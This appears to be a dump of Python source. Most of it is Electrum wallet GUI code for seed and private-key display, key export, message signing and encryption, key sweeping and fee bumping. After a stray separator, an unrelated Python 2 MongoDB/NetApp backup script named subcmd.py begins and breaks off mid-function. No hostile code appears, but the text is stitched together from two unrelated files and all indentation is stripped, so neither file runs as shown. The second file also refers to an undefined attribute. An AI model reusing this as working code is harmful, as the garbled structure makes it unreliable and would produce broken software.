# only show the combobox in case multiple accounts are available
if len(keystores) > 1:
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: select_ks(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Select keystore"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
for ks in keystores:
ks_w = QWidget()
ks_vbox = QVBoxLayout()
ks_vbox.setContentsMargins(0, 0, 0, 0)
ks_w.setLayout(ks_vbox)
mpk_text = ShowQRTextEdit(ks.get_master_public_key(), config=self.config)
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
run_hook('show_xpub_button', mpk_text, ks)
der_path_hbox = QHBoxLayout()
der_path_hbox.setContentsMargins(0, 0, 0, 0)
der_path_hbox.addWidget(QLabel(_("Derivation path") + ':'))
der_path_text = QLabel(ks.get_derivation_prefix() or _("unknown"))
der_path_text.setTextInteractionFlags(Qt.TextSelectableByMouse)
der_path_hbox.addWidget(der_path_text)
der_path_hbox.addStretch()
ks_vbox.addWidget(QLabel(_("Master Public Key")))
ks_vbox.addWidget(mpk_text)
ks_vbox.addLayout(der_path_hbox)
ks_stack.addWidget(ks_w)
select_ks(0)
vbox.addWidget(ks_stack)
vbox.addStretch(1)
btn_export_info = run_hook('wallet_info_buttons', self, dialog)
btn_close = CloseButton(dialog)
btns = Buttons(btn_export_info, btn_close)
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase, config=self.config)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None, *,
help_text=None, show_copy_text_btn=False):
if not data:
return
d = QRDialog(
data=data,
parent=parent or self,
title=title,
help_text=help_text,
show_copy_text_btn=show_copy_text_btn,
config=self.config,
)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk, config=self.config)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def import_channel_backup(self, encrypted: str):
if not self.question('Import channel backup?'):
return
try:
self.wallet.lnworker.import_channel_backup(encrypted)
except Exception as e:
self.show_error("failed to import backup" + '\n' + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except UserFacingException as e:
self.show_error(e)
return
except BaseException as e:
self.logger.exception('camera error')
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if data.lower().startswith(BITCOIN_BIP21_URI_SCHEME + ':'):
self.pay_to_URI(data)
return
if data.lower().startswith('channel_backup:'):
self.import_channel_backup(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = getOpenFileName(
parent=self,
title=_("Select your transaction file"),
filter=TRANSACTION_FILE_EXTENSION_FILTER_ANY,
config=self.config,
)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(
parent=self,
title=_('Input raw transaction'),
header_layout=_("Transaction:"),
ok_label=_("Load transaction"),
config=self.config,
)
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_text_channel_backup(self):
text = text_dialog(
parent=self,
title=_('Input channel backup'),
header_layout=_("Channel Backup:"),
ok_label=_("Load backup"),
config=self.config,
)
if not text:
return
if text.startswith('channel_backup:'):
self.import_channel_backup(text)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
raw_tx = self._fetch_tx_from_network(txid)
if not raw_tx:
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
def _fetch_tx_from_network(self, txid: str) -> Optional[str]:
if not self.network:
self.show_message(_("You are offline."))
return
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except UntrustedServerReturnedError as e:
self.logger.info(f"Error getting transaction from network: {repr(e)}")
self.show_message(_("Error getting transaction from network") + ":\n" + e.get_message_for_gui())
return
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
return raw_tx
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join(map(lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
os.chmod(fileName, 0o600)
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), self.wallet.import_labels, on_import)
def do_export_labels(self):
export_meta_gui(self, _('labels'), self.wallet.export_labels)
def import_invoices(self):
import_meta_gui(self, _('invoices'), self.wallet.import_invoices, self.invoice_list.update)
def export_invoices(self):
export_meta_gui(self, _('invoices'), self.wallet.export_invoices)
def import_requests(self):
import_meta_gui(self, _('requests'), self.wallet.import_requests, self.request_list.update)
def export_requests(self):
export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp_dialog(self, parent_tx: Transaction) -> None:
new_tx = self.wallet.cpfp(parent_tx, 0)
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
fee_for_child = fee_e.get_amount()
if fee_for_child is None:
return
out_amt = max_fee - fee_for_child
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_for_child
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_combo = FeeComboBox(fee_slider)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(fee_combo, 4, 2)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee is None:
return # fee left empty, treat is as "cancel"
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
try:
new_tx = self.wallet.cpfp(parent_tx, fee)
except CannotCPFP as e:
self.show_error(str(e))
return
self.show_transaction(new_tx)
def _add_info_to_tx_from_wallet_and_network(self, tx: PartialTransaction) -> bool:
"""Returns whether successful."""
# note side-effect: tx is being mutated
assert isinstance(tx, PartialTransaction)
try:
# note: this might download input utxos over network
BlockingWaitingDialog(
self,
_("Adding info to tx, from wallet and network..."),
lambda: tx.add_info_from_wallet(self.wallet, ignore_network_issues=False),
)
except NetworkException as e:
self.show_error(repr(e))
return False
return True
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = BumpFeeDialog(main_window=self, tx=tx, txid=txid)
d.run()
def dscancel_dialog(self, tx: Transaction):
txid = tx.txid()
if not isinstance(tx, PartialTransaction):
tx = PartialTransaction.from_tx(tx)
if not self._add_info_to_tx_from_wallet_and_network(tx):
return
d = DSCancelDialog(main_window=self, tx=tx, txid=txid)
d.run()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
subcmd.py | #!/usr/bin/env python2
import logging
import multiprocessing as mp
import multiprocessing.queues
import xml.dom.minidom
from arch_temp_data import ArchTempData
from datetime import datetime, timedelta
from host_conn import HostConn
from kairoslib.kairos_aptr import AppKairosAPTR
from mongodbcluster import MongoDBCluster
from ontap import ClusterSession, Snapshot, FlexClone, InitiatorGroup, Lun, Volume
from psutil import Process
from pymongo import MongoClient, errors
from recover_consumer import RecoverConsumer
from sys import exit
from time import sleep, time
class SubCmdMongodb:
def __init__(self, mdbcluster_spec=None):
if mdbcluster_spec is not None:
for mdb_key in mdbcluster_spec.keys():
if mdbcluster_spec[mdb_key] is None:
mdbcluster_spec.pop(mdb_key)
self.mdb_spec = mdbcluster_spec
def add(self, kdb_session=None, kdb_collection=None):
if type(self._testing_conn()) is not bool:
logging.error('Cannot connect to MongoDB Cluster.')
exit(1)
else:
try:
collection = kdb_session[kdb_collection]
collection.insert_one(self.mdb_spec).inserted_id
except errors.DuplicateKeyError, e:
logging.error(e.message)
exit(1)
def remove(self, kdb_session=None, kdb_collection=None):
collection = kdb_session[kdb_collection]
collection.delete_one({'cluster-name': self.mdb_spec['cluster-name']})
@staticmethod
def list(kdb_session=None, kdb_collection=None):
collection = kdb_session[kdb_collection]
result = collection.find()
return result
def _testing_conn(self):
try:
mdbcluster = MongoClient(self.mdb_spec['mongodb-uri'])
test_conn = mdbcluster.is_mongos
if type(test_conn) == bool:
return True
else:
return False
except errors.ServerSelectionTimeoutError, e:
logging.error(e.message)
exit(1)
class SubCmdNetapp:
def __init__(self, ntapsys_spec=None):
if ntapsys_spec is not None:
for ntapsys_key in ntapsys_spec.keys():
if ntapsys_spec[ntapsys_key] is None:
ntapsys_spec.pop(ntapsys_key)
self.netappsys = ntapsys_spec
def add(self, kdb_session, kdb_collection):
verify_netapp = self._testing_conn()
if type(verify_netapp) is tuple:
logging.error('Failed to connect to ' + self.ndp_spec['netapp-ip'])
exit(1)
elif (type(verify_netapp) is list) or (type(verify_netapp) is str):
collection = kdb_session[kdb_collection]
try:
collection.insert_one(self.netappsys).inserted_id
logging.info('NetApp system ' + self.netappsys['netapp-ip'] + ' has been added to the database.')
except errors.DuplicateKeyError, e:
logging.error(e.message)
exit(1)
def remove(self, kdb_session, kdb_collection):
collection = kdb_session[kdb_collection]
try:
result = collection.delete_one({'netapp-ip': self.netappsys['netapp-ip']}).deleted_count
return result
except errors, e:
logging.error(e.message)
exit(1)
def list(self, kdb_session, kdb_collection):
collection = kdb_session[kdb_collection]
result = collection.find()
return result
def _testing_conn(self):
if 'svm-name' not in self.netappsys:
ns = ClusterSession(self.netappsys['netapp-ip'], self.netappsys['username'], self.netappsys['password'])
return ns.get_nodes()
else:
ns = ClusterSession(self.netappsys['netapp-ip'], self.netappsys['username'], self.netappsys['password'],
self.netappsys['svm-name'])
return ns.get_vserver()
class SubCmdBackup:
def __init__(self, bkp_spec=None):
if bkp_spec is not None:
self.backup = bkp_spec
def create(self, kdb_session):
try:
kdb_mdbclusters = kdb_session['mdbclusters']
cluster_info = kdb_mdbclusters.find_one({'cluster-name': self.backup['cluster-name']})
if cluster_info is None:
logging.error('MongoDB cluster ' + self.backup['cluster-name'] + ' not found.')
exit(1)
logging.info('Found ' + self.backup['cluster-name'] + ' on Kairos repository.')
except errors.ConnectionFailure or errors.CursorNotFound, e:
logging.error(e.message)
exit(1)
if cluster_info['mongodb-auth'] == 'off':
mdbcluster = MongoDBCluster(cluster_info['mongodb-uri'])
else:
pass
# -- backup metadata data structure
bkp_metadata = dict()
# -- Getting MongoDB cluster topology
topology = mdbcluster.get_topology()
logging.info(self.backup['cluster-name'] + ' is a ' + topology['cluster_type'] + ' cluster.')
if topology['cluster_type'] == 'replSet':
for rs_member in topology['members']:
if rs_member['stateStr'] == 'PRIMARY' or rs_member['stateStr'] == 'SECONDARY':
host = HostConn(ipaddr=rs_member['name'].split(':')[0], username=self.backup['username'])
rs_member['storage_info'] = host.get_storage_layout(cluster_info['mongodb-mongod-conf'])
host.close()
